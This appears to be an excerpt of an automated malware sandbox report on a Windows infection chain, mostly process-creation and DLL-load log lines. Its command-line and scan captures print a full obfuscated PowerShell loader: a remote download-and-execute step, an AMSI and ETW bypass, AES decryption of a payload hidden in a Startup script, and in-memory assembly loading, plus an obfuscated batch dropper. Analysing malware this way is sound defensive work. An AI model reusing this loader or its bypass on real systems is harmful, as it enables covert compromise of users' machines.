Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat", "true");ITextStream.WriteLine("%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%");ITextStream.WriteLine("%OAV%s%OAV%e%OAV%t%OAV%l%OAV%o%OAV%c%OAV%a%OAV%l%OAV% %OAV%e%OAV%n%OAV%a%OAV%b%OAV%l%OAV%e%OAV%d%OAV%e%OAV%l%OAV%a%OAV%y%OAV%e%OAV%d%OAV%e%OAV%x%OAV%p%OAV%a%OAV%n%OAV%s%OAV%i%OAV%o%OAV%n");ITextStream.WriteLine("%MWF%s%MWF%e%MWF%t%MWF% "GZTDNJ=%MWF%OULDEs%OULDEMWF%e%MWF%OULDEt%MWF%OULDE ZDZOULDEJ=1 &OULDE&OULDE %MWFOULDE%s%MWF%OULDEt%MWF%aOULDE%MWF%rOULDE%MWF%OULDEt%OULDEMWFOULDE%OULDE "" /OULDEminOULDE OULDE"");ITextStream.WriteLine("%WZQ%s%WZQ%e%WZQ%t%WZQ% "IVCXSO=&& OULDEexitOULDE"");ITextStream.WriteLine("%GUM%s%GUM%e%GUM%t%GUM% "AKMRNV=%GUM%nOULDE%GUMOULDE%OULDEo%GUM%OULDEt%GUMOULDE% %GUM%OULDEd%GUM%OULDEe%OULDEGUM%fOULDE%GUMOULDE%iOULDE%GUM%nOULDE%GUMOULDE%e%OULDEGUM%d%OULDEGUM%OULDE ZDOULDEZJOULDE");ITextStream.WriteLine("%OYV%i%OYV%f%OYV% %AKMRNV:OULDE=% (%GZTDNJ:OULDE=%%0 %IVCXSO:OULDE=%)");ITextStream.WriteLine("::KxTWIi9guyjF7tfG57+5GIF7QiGzRahVE/ZnciTu0akmSkYpWygbIG+SFSGFODecAh3n19LPuSyKsKyLFMGyxfYL8QjEGJlD2r5+1btrn1Ohc8XLqC+TVYU618+2McBwH1rcwLZVzR1wGZpPqFsadbCBhjYZBcLDjAEqyKUm7wUHi7AaGpVQ5ixdI7YNMHi6ejdV0aLXjrwWxwCOTMiYgXy73aP+f2r");ITextStream.WriteLine("%LRVWJ%s%LRVWJ%e%LRVWJ%t%LRVWJ% "AK=%LRVWJ%WOULDE%LRVWJOULDE%i%LRVWJ%nOULDE%LRVWJ%dOULDE%LRVWJOULDE%o%LRVWJOULDE%wOULDE%LRVWJ%OULDEs%LRVWJOULDE%P%OULDELRVWJ%oOULDE%LRVWJ%w%OULDELRVWJOULDE%e%LRVWJOULDE%rOULDE%OULDELRVWJ%SOULDE");ITextStream.WriteLine("%YGD%s%YGD%e%YGD%t%YGD% BP=C:\Windows\SysWOW64\%AK:OULDE=%");ITextStream.WriteLine("%ZNLHZ%i%ZNLHZ%f%ZNLHZ% %ZNLHZ%n%ZNLHZ%o%ZNLHZ%t%ZNLHZ% %ZNLHZ%e%ZNLHZ%x%ZNLHZ%i%ZNLHZ%s%ZNLHZ%t%ZNLHZ% %BP% (set BP=%BP:SysWOW64=System32%)");ITextStream.WriteLine("%EUZLM%s%EUZLM%e%EUZLM%t%EUZLM% "YASETD=;$POIOULDEJOOULDEGOULDED='ROULDEeaOULDEdLEOULDEKOXOULDECULOULDEinOULDEeOULDEEKOXCOULDEULOULDEsEOULDEKOULDEOXCULOULDE'.ROULDEepOULDElOULDEaOULDEce('EOULDEKOXCUOULDEL'OULDE,OULDE 'OULDE')");ITextStream.WriteLine("%RSTYH%s%RSTYH%e%RSTYH%t%RSTYH% "KRRBGS=$hOULDEost.OULDEUI.ROULDEawUOULDEI.WOULDEiOULDEndowOULDETiOULDEtle=OULDE"");ITextStream.WriteLine("%QZZPO%e%QZZPO%c%QZZPO%h%QZZPO%o%QZZPO% %KRRBGS:OULDE=%'%~0'%YASETD:OULDE=% | %BP%");ITextStream.WriteLine("%PIIBS%t%PIIBS%i%PIIBS%m%PIIBS%e%PIIBS%o%PIIBS%u%PIIBS%t%PIIBS% %PIIBS%/%PIIBS%n%PIIBS%o%PIIBS%b%PIIBS%r%PIIBS%e%PIIBS%a%PIIBS%k%PIIBS% %PIIBS%/%PIIBS%t%PIIBS% %PIIBS%1%PIIBS% %PIIBS%>%PIIBS%n%PIIBS%u%PIIBS%l%PIIBS%");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat", "true");ITextStream.WriteLine("%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%");ITextStream.WriteLine("%OAV%s%OAV%
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); @{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this mod
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); @{GUID="1DA87E53-152B-403E-98DC-74D7B4D63D59"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Micros
